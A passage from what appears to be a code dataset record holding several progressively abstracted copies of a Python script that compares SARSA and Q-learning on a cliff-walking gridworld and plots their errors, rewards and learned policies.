self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\ngamma = 1\nlearning_rate = 0.01\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n", "<import token>\nN_ROWS = 6\nN_COLUMNS = 10\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\ngamma = 1\nlearning_rate = 0.01\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\nN_STEPS = 10000\nMETHOD = 'BOTH'\nEPSILONS = [0.05, 0.1, 0.25]\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\nmistakes_q_learning = []\nmistakes_sarsa = []\nPLOTS = 0\nfig, axes = plt.subplots(3, 2)\nrewards = []\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\nif METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:\n print('invalidt method. must be Q_LEARNING or SARSA or both')\n import sys\n sys.exit()\n<assignment token>\nfor epsilon in EPSILONS:\n if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':\n _mistakes_q_learning, end_states_q_learning, episode_rewards = (\n run_code(use_q_learning=True, _epsilon=epsilon))\n plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING',\n epsilon, PLOTS, fig, axes)\n display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)\n mistakes_q_learning.append((epsilon, _mistakes_q_learning))\n rewards.append(('Q_LEARNING', epsilon, episode_rewards))\n PLOTS += 1\nfor epsilon in EPSILONS:\n if METHOD == 'SARSA' or METHOD == 'BOTH':\n _mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(\n use_q_learning=False, _epsilon=epsilon)\n plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS,\n fig, axes)\n display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)\n mistakes_sarsa.append((epsilon, _mistakes_sarsa))\n rewards.append(('SARSA', epsilon, episode_rewards))\n PLOTS += 1\nplt.savefig('all_runs.png')\nplt.show()\nfor reward in rewards:\n plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))\n plt.xlabel('Episodes')\n plt.ylabel('Sum of rewards during episode')\nplt.legend()\nplt.show()\nplt.savefig('episode_rewards.png')\nplot_errors(mistakes_sarsa, mistakes_q_learning)\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return best_q_values[randint(0, len(best_q_values) - 1)][0]\n else:\n _max_q = np.argmax(self.q_values)\n return _max_q\n\n def get_max_q_value(self):\n return np.max(self.q_values)\n\n\ndef initialize_states():\n states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]\n for j in range(1, N_COLUMNS - 1):\n states[-1][j].is_cliff = True\n states[-1][-1].is_goal = True\n return states\n\n\ndef reward(s_1, s_2):\n if s_1.is_goal or s_1.is_cliff:\n return 0\n elif s_2.is_goal:\n return 10\n elif s_2.is_cliff:\n return -100\n else:\n return -1\n\n\n<docstring token>\n\n\ndef transition(stsp, s, di, dj):\n if s.is_cliff or s.is_goal:\n return s\n elif s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS):\n return s\n else:\n return stsp[s.i + di][s.j + dj]\n\n\n<assignment token>\n\n\ndef action_to_diff_vector(action):\n if action == 0:\n return -1, 0\n elif action == 1:\n return 0, 1\n elif action == 2:\n return 1, 0\n elif action == 3:\n return 0, -1\n\n\ndef action_to_verbose(action):\n if action == 0:\n return 'NORTH'\n elif action == 1:\n return 'EAST'\n elif action == 2:\n return 'SOUTH'\n elif action == 3:\n return 'WEST'\n\n\ndef sarsa(state, next_state, action, next_state_action):\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma * next_state\n .q_values[next_state_action] - state.q_values[action])\n\n\ndef q_learning(state, next_state, action, next_state_action):\n next_state_q_value = next_state.get_max_q_value()\n return reward(state, next_state), state.q_values[action\n ] + learning_rate * (reward(state, next_state) + gamma *\n next_state_q_value - state.q_values[action])\n\n\n<assignment token>\n\n\ndef run_code(use_q_learning=False, _epsilon=0.01):\n states = initialize_states()\n decay = 1\n min_epsilon = 1e-05\n epsilon = _epsilon\n episode_rewards = []\n mistakes_array = []\n for i in range(N_STEPS):\n current_state = states[N_ROWS - 1][0]\n epsilon = max(min_epsilon, epsilon * decay)\n episode_reward = 0\n while not current_state.is_terminal():\n if random() < epsilon:\n next_action = randint(0, 3)\n else:\n next_action = current_state.get_max_q_index()\n di, dj = action_to_diff_vector(next_action)\n next_state = transition(states, current_state, di, dj)\n if random() < epsilon:\n next_state_action = randint(0, 3)\n else:\n next_state_action = next_state.get_max_q_index()\n if use_q_learning:\n reward, current_state.q_values[next_action] = q_learning(\n current_state, next_state, next_action, next_state_action)\n else:\n reward, current_state.q_values[next_action] = sarsa(\n current_state, next_state, next_action, next_state_action)\n episode_reward += reward\n current_state = next_state\n if len(episode_rewards):\n episode_rewards.append(episode_rewards[-1] + episode_reward)\n else:\n episode_rewards.append(episode_reward)\n \"\"\"\n if (i % 100 == 0):\n print(i)\n \"\"\"\n mistakes_array.append(check_accuracy(states))\n return np.array(mistakes_array), states, episode_rewards\n\n\ndef check_accuracy(states):\n correct_result = np.array([[-3, -2, -1, 0, 1, 2, 3, 4, 5, 6], [-2, -1, \n 0, 1, 2, 3, 4, 5, 6, 7], [-1, 0, 1, 2, 3, 4, 5, 6, 7, 8], [0, 1, 2,\n 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0]])\n mistakes_delta = 0\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n mistakes_delta += abs(correct_result[i][j] - max(states[i][j].\n q_values))\n return mistakes_delta\n\n\ndef plot_errors(mistakes_sarsa, mistakes_q_learning):\n plt.gca().invert_yaxis()\n legend = []\n for mistake_sarsa in mistakes_sarsa:\n plt.plot(mistake_sarsa[1])\n legend.append('SARSA $\\\\epsilon={}$'.format(mistake_sarsa[0]))\n for mistake_q_learning in mistakes_q_learning:\n plt.plot(mistake_q_learning[1])\n legend.append('Q-learning $\\\\epsilon={}$'.format(mistake_q_learning[0])\n )\n plt.grid(which='y')\n plt.legend(legend)\n plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))\n\n\ndef plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):\n final_grid = np.array([[max(states[i][j].q_values) for j in range(\n N_COLUMNS)] for i in range(N_ROWS)])\n if PLOTS > 2:\n ax = ax[PLOTS % 3, 1]\n else:\n ax = ax[PLOTS, 0]\n ax.imshow(final_grid, aspect='auto', cmap='coolwarm')\n ax.set_xticks(np.arange(N_COLUMNS))\n ax.set_yticks(np.arange(N_ROWS))\n ax.set_xticklabels([i for i in range(N_COLUMNS)])\n ax.set_yticklabels([i for i in range(N_ROWS)])\n plt.setp(ax.get_xticklabels(), rotation=45, ha='right', rotation_mode=\n 'anchor')\n for i in range(N_ROWS):\n for j in range(N_COLUMNS):\n text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)\n ), ha='center', va='center', color='w')\n fig.tight_layout()\n ax.set_title('{}; $\\\\epsilon={}$'.format(method, epsilon))\n for i in range(N_ROWS):\n str_ = ''\n for j in range(N_COLUMNS):\n str_ += str(int(final_grid[i][j])) + ', '\n PLOTS += 1\n\n\ndef display_optimal_policy(states, method, epsilon):\n print('{}; ε = {}'.format(method, epsilon))\n print('-' * 60)\n for i in range(len(states)):\n line_str = ''\n for j in range(len(states[0])):\n if j == 0:\n print('|', end='')\n if states[i][j].is_goal:\n print(Back.GREEN + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n elif states[i][j].is_cliff:\n print(Back.RED + ' ', end='')\n print(Style.RESET_ALL + ' | ', end='')\n else:\n print(' {} | '.format(q_to_arrow(states[i][j].\n get_max_q_index())), end='')\n print(line_str)\n print('-' * 60)\n\n\n<code token>\n<assignment token>\n<code token>\n", "<import token>\n<assignment token>\n\n\nclass State(object):\n\n def __init__(self, i, j, is_cliff=False, is_goal=False):\n self.i = i\n self.j = j\n self.is_cliff = is_cliff\n self.is_goal = is_goal\n self.q_values = np.array([0.0, 0.0, 0.0, 0.0])\n\n def __str__(self):\n return '({}, {})'.format(self.i, self.j)\n\n def is_terminal(self):\n return self.is_goal or self.is_cliff\n\n def get_max_q_index(self):\n best_q_values = np.argwhere(self.q_values == np.max(self.q_values))\n if len(best_q_values) > 1:\n return 